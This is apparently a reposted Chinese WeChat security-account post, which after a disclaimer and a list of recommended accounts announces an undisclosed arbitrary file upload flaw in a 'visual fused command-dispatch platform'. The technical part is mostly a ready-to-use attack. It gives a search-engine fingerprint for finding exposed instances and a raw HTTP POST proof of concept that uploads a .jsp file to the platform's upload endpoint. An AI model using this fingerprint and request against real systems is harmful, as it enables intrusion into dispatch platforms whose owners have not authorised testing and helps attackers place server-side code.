本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
先推荐一下为大家挑选的高质量网安公众号(漏洞详情在后面)
以下公众号长期更新涉及攻防演练、SRC赏金技巧、渗透挖洞实战思路、安全工具、应急响应以及最新漏洞预警等方向的告质量文章。欢迎各位关注!
1、黑熊安全
本公众号会发布实战,内网,免杀,溯源,应急,代码审计相关的文章。
2、不秃头的安全
不秃头的安全,专注于信息安全攻防技术、SRC赏金与网络安全知识分享。
专注漏洞复现,漏洞分享,不定期分享1day/0day漏洞POC及红队攻防等技术文章。
不知攻焉知防,不定时分享一些常用的渗透测试工具、免杀工具、漏洞复现、教程等资源。
安全研究工作,输出有价值的研究成果。跟踪国内外漏洞信息,国内外安全动态,安全攻防技术研究WEB漏洞利用方式以及漏洞原理、代码审计技能,精通多种编程语言,如Java、Python、PHP汇编等漏洞挖掘、利用条件分析实战经验分享
时而吹水,时而分享学习成长的一介散修。
日更未公开漏洞,速速上分。还有更多实战报告,专注漏洞第一线。
在网安领域练习两年半的网安练习生,专注web漏洞挖掘、各大企业src和edusrc,欢迎小黑子大黑客私聊交流技术。
专注网络安全新思路、新视野、新方向、新技术的分享,致力推动网络安全行业蓬勃发展。
主要分享一些个人实战经验,以及相关漏洞复现,代码审计等方面文章,欢迎大家关注我的公众号~
可视化融合指挥调度平台存在任意文件上传漏洞
body="base/searchInfoWindow_min.css"
可视化融合指挥调度平台
POC:
POST /dispatch/layuiIm/uploadFile HTTP/1.1Host:Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7ctER307B0RaQwOpContent-Length: 151------WebKitFormBoundary7ctER307B0RaQwOpContent-Disposition: form-data; name="file";filename="1.jsp"1------WebKitFormBoundary7ctER307B0RaQwOp--
本工具或文章来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!
原文始发于微信公众号(黑熊安全):【未公开漏洞】可视化融合指挥调度平台存在任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论